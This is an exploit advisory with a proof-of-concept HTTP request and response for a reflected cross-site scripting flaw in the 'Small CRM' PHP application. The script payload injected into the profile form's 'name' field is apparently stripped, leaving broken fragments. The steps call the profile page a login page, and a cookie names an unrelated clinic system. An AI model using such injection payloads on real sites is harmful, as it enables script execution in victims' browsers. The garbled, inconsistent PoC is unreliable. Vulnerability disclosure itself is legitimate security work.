# Exploit Title: Small CRM Developed using PHP and MySQL - Cross-Site Scripting (Reflected) # Date: 05.06.2024 # Exploit Author: Furkan Eren Tetik # Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads # Software Link: https://phpgurukul.com/small-crm-php # Version: 1.0 # Tested on: Windows 11, Kali Linux # Small CRM Developed System can be attacked with xss with a simple script # https://www.linkedin.com/in/furkanerentetik/ Steps To Reproduce: 1 - Go to the login page http://localhost/crm/crm/profile.php 2 - Add new record payload= 'name='>' 3 - Enter on alert warning appears. PoC Request POST /crm/crm/profile.php HTTP/1.1 Host: localhost Content-Length: 674 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYFQBlbKN8Nl8KtgW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/crm/crm/profile.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: online_clinic_management_system=9fcs116dusfd3m2gjh88b8s777; PHPSESSID=1 Connection: close ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW Content-Disposition: form-data; name="name" "> ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW Content-Disposition: form-data; name="alt_email" ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW Content-Disposition: form-data; name="phone" 0000000000 ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW Content-Disposition: form-data; name="gender" m ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW Content-Disposition: form-data; name="address" deneme ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW Content-Disposition: form-data; name="update" Update ------WebKitFormBoundaryYFQBlbKN8Nl8KtgW-- ---------------------------------------------------------------------------------------------- Response HTTP/1.1 200 OK Date: Tue, 04 Jun 2024 22:22:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13521 CRM | User Profile
CRM

BROWSE

fet's Profile

Your Profile

Registration Date :2024-06-05 01:16:29
" class="form-control"/>